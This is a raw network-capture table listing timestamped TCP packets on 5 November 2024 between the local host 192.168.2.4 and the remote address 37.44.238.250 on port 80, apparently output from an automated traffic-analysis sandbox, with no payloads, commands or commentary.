                                                                                            Nov 5, 2024 23:52:50.675709009 CET4976180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:50.680623055 CET804976137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:50.902367115 CET4976280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:50.907223940 CET804976237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:50.907288074 CET4976280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:50.907403946 CET4976280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:50.912549973 CET804976237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:50.913114071 CET4976180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:50.918260098 CET804976137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:50.918330908 CET4976180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:51.262037992 CET4976280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:51.266972065 CET804976237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:51.267066002 CET804976237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:51.592179060 CET4976380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:51.599044085 CET804976337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:51.599111080 CET4976380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:51.599241018 CET4976380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:51.606540918 CET804976337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:51.719980001 CET804976237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:51.792475939 CET804976237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:51.792546034 CET4976280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:51.946196079 CET4976380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:51.951086044 CET804976337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:52.425318003 CET804976337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:52.498301029 CET804976337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:52.498363018 CET4976380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:52.624409914 CET4976280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:52.624469042 CET4976380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:52.625446081 CET4976480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:52.630147934 CET804976237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:52.630158901 CET804976337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:52.630202055 CET4976280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:52.630222082 CET4976380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:52.630342960 CET804976437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:52.632206917 CET4976480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:52.632312059 CET4976480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:52.637213945 CET804976437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:52.977530003 CET4976480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:52.982373953 CET804976437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:53.453485012 CET804976437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:53.529540062 CET804976437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:53.530736923 CET4976480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:53.711711884 CET4976480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:53.712692976 CET4976580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:53.717147112 CET804976437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:53.717210054 CET4976480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:53.717566013 CET804976537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:53.717622995 CET4976580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:53.717717886 CET4976580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:53.722508907 CET804976537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:54.071305037 CET4976580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:54.076368093 CET804976537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:54.545664072 CET804976537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:54.586674929 CET4976580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:54.623833895 CET804976537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:54.664789915 CET4976580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:54.741970062 CET4976580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:54.742732048 CET4976680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:54.747620106 CET804976537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:54.747677088 CET4976580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:54.747809887 CET804976637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:54.747888088 CET4976680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:54.747970104 CET4976680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:54.752757072 CET804976637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:55.102586985 CET4976680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:55.107611895 CET804976637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:55.561048031 CET804976637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:55.602303028 CET4976680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:55.638500929 CET804976637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:55.680425882 CET4976680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:55.758733988 CET4976680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:55.759325027 CET4976880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:55.764992952 CET804976837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:55.765062094 CET4976880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:55.765150070 CET4976880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:55.769911051 CET804976837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:55.770199060 CET804976637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:55.770251036 CET4976680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:56.118107080 CET4976880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:56.123085022 CET804976837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:56.591636896 CET804976837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:56.667316914 CET804976837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:56.667469978 CET4976880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:56.806337118 CET4976880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:56.806744099 CET4976980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:56.811585903 CET804976937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:56.811678886 CET4976980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:56.811791897 CET4976980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:56.811851978 CET4977080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:56.812386036 CET804976837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:56.812437057 CET4976880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:56.816745043 CET804976937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:56.816756010 CET804977037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:56.816826105 CET4977080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:56.816936970 CET4977080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:56.821898937 CET804977037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:57.164895058 CET4977080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:57.164937019 CET4976980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:57.169780016 CET804977037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:57.169790030 CET804976937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:57.169984102 CET804976937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:57.615921974 CET804976937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:57.636512041 CET804977037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:57.686734915 CET804976937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:57.686790943 CET4976980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:57.687412977 CET4977080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:57.693201065 CET804977037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:57.693244934 CET4977080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:57.805180073 CET4976980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:57.806153059 CET4977280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:57.810852051 CET804976937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:57.811100006 CET804977237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:57.811157942 CET4976980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:57.811201096 CET4977280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:57.811280966 CET4977280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:57.816512108 CET804977237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:58.164865971 CET4977280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:58.170129061 CET804977237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:58.633621931 CET804977237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:58.710669994 CET804977237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:58.712354898 CET4977280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:58.871757984 CET4977280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:58.874677896 CET4977380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:58.877013922 CET804977237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:58.877190113 CET4977280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:58.879486084 CET804977337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:58.879568100 CET4977380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:58.879673958 CET4977380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:58.884922028 CET804977337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:59.227482080 CET4977380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:59.232410908 CET804977337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:59.698623896 CET804977337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:59.742933035 CET4977380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:59.766890049 CET804977337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:59.910177946 CET4977380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:59.910800934 CET4977980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:59.916264057 CET804977937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:59.916322947 CET4977980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:59.916630030 CET804977337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:59.916681051 CET4977380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:59.916762114 CET4977980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:59.921801090 CET804977937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:00.274300098 CET4977980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:00.279525042 CET804977937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:00.728030920 CET804977937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:00.806282997 CET4977980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:00.807709932 CET804977937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:00.914803982 CET4977980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:00.941351891 CET4977980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:00.942059040 CET4978480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:00.946490049 CET804977937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:00.946547985 CET4977980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:00.946827888 CET804978437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:00.946886063 CET4978480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:00.947052002 CET4978480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:00.951838017 CET804978437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:01.305496931 CET4978480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:01.310450077 CET804978437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:01.759044886 CET804978437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:01.821067095 CET4978480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:01.831165075 CET804978437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:02.011989117 CET4978480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:02.169101954 CET4978480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:02.169751883 CET4978980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:02.174421072 CET804978437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:02.174474955 CET4978480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:02.174882889 CET804978937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:02.174987078 CET4978980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:02.175106049 CET4978980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:02.179968119 CET804978937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:02.524265051 CET4978980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:02.529196024 CET804978937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:02.697432041 CET4979280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:02.699558020 CET4978980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:02.702348948 CET804979237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:02.702426910 CET4979280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:02.702539921 CET4979280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:02.707420111 CET804979237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:02.747586966 CET804978937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:02.760602951 CET804978937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:02.760663986 CET4978980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:02.831774950 CET4979380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:02.836595058 CET804979337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:02.836685896 CET4979380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:02.836927891 CET4979380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:02.841670036 CET804979337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:03.055535078 CET4979280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:03.060534000 CET804979237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:03.060592890 CET804979237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:03.196155071 CET4979380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:03.201037884 CET804979337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:03.523082018 CET804979237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:03.594216108 CET804979237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:03.596204042 CET4979280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:03.664726019 CET804979337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:03.742909908 CET4979380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:03.744987011 CET804979337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:03.866828918 CET4979280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:03.866889000 CET4979380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:03.867712975 CET4979980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:03.872061014 CET804979237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:03.872191906 CET4979280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:03.872592926 CET804979337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:03.872644901 CET4979380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:03.872803926 CET804979937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:03.872867107 CET4979980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:03.872970104 CET4979980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:03.877995968 CET804979937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:04.227560043 CET4979980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:04.232574940 CET804979937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:04.682724953 CET804979937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:04.742940903 CET4979980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:04.758843899 CET804979937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:04.886074066 CET4979980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:04.887722015 CET4980580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:04.891211033 CET804979937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:04.891258955 CET4979980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:04.892493010 CET804980537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:04.892574072 CET4980580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:04.892666101 CET4980580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:04.897480965 CET804980537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:05.242994070 CET4980580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:05.247987986 CET804980537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:05.735794067 CET804980537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:05.805546045 CET4980580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:05.813324928 CET804980537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:05.914783955 CET4980580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:05.942924976 CET4980580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:05.943516016 CET4981380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:05.948136091 CET804980537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:05.948193073 CET4980580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:05.948318005 CET804981337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:05.948384047 CET4981380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:05.948481083 CET4981380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:05.953242064 CET804981337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:06.305485010 CET4981380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:06.310336113 CET804981337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:06.790745974 CET804981337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:06.869643927 CET804981337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:06.869729042 CET4981380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:07.390779018 CET4981380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:07.396217108 CET804981337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:07.396286011 CET4981380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:07.417300940 CET4981880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:07.422162056 CET804981837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:07.422235966 CET4981880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:07.422339916 CET4981880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:07.427081108 CET804981837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:07.774241924 CET4981880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:07.779274940 CET804981837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:08.239286900 CET804981837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:08.305416107 CET4981880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:08.310966969 CET804981837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:08.414802074 CET4981880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:08.434556961 CET4981880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:08.435408115 CET4982780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:08.439861059 CET804981837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:08.439925909 CET4981880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:08.440274954 CET804982737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:08.440344095 CET4982780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:08.440433979 CET4982780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:08.445652008 CET804982737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:08.604320049 CET4982780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:08.605758905 CET4983080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:08.610788107 CET804983037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:08.610991955 CET4983080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:08.611149073 CET4983080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:08.616081953 CET804983037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:08.651362896 CET804982737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:08.731575012 CET4983180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:08.736412048 CET804983137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:08.736473083 CET4983180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:08.736589909 CET4983180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:08.741390944 CET804983137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:08.961719990 CET4983080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:08.966702938 CET804983037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:08.966718912 CET804983037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:09.017143011 CET804982737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:09.017215014 CET4982780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:09.086726904 CET4983180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:09.091535091 CET804983137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:09.420377016 CET804983037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:09.490633965 CET804983037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:09.490695953 CET4983080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:09.550338984 CET804983137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:09.626386881 CET804983137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:09.626460075 CET4983180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:10.074155092 CET4983080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:10.074417114 CET4983180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:10.075186014 CET4983780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:10.079539061 CET804983037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:10.079641104 CET4983080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:10.079843044 CET804983137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:10.079905033 CET4983180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:10.080066919 CET804983737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:10.080136061 CET4983780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:10.080252886 CET4983780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:10.085062981 CET804983737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:10.430583954 CET4983780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:10.435499907 CET804983737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:10.899797916 CET804983737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:10.976063967 CET804983737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:10.976146936 CET4983780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:11.102839947 CET4984380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:11.107783079 CET804984337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:11.107865095 CET4984380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:11.107933044 CET4984380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:11.112704039 CET804984337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:11.461736917 CET4984380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:11.466784000 CET804984337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:11.911993027 CET804984337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:11.991229057 CET804984337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:11.991288900 CET4984380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:12.590481043 CET4983780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:12.598078012 CET4984380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:12.603409052 CET804984337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:12.606081963 CET4984380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:12.707065105 CET4985180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:12.711951017 CET804985137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:12.712034941 CET4985180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:12.712198973 CET4985180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:12.716980934 CET804985137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:13.071161032 CET4985180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:13.076124907 CET804985137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:13.542640924 CET804985137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:13.618491888 CET804985137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:13.618551970 CET4985180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:13.741198063 CET4985180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:13.741858959 CET4985980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:13.746505022 CET804985137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:13.746634007 CET804985937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:53:13.746686935 CET4985180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:13.746716022 CET4985980192.168.2.437.44.238.250
